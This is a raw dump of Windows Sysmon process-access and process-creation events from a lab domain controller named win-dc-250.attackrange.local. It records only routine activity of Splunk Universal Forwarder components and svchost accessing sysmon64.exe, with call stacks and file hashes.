13:39:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4985-6000-7A05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.500{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4985-6000-7A05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:17.501{08A6967A-4985-6000-7A05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.922{08A6967A-4986-6000-7C05-000000009A01}45084588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4986-6000-7C05-000000009A01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4986-6000-7C05-000000009A01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.765{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4986-6000-7C05-000000009A01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.767{08A6967A-4986-6000-7C05-000000009A01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.328{08A6967A-4986-6000-7B05-000000009A01}67206916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4986-6000-7B05-000000009A01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4986-6000-7B05-000000009A01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4986-6000-7B05-000000009A01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:18.172{08A6967A-4986-6000-7B05-000000009A01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4987-6000-7D05-000000009A01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 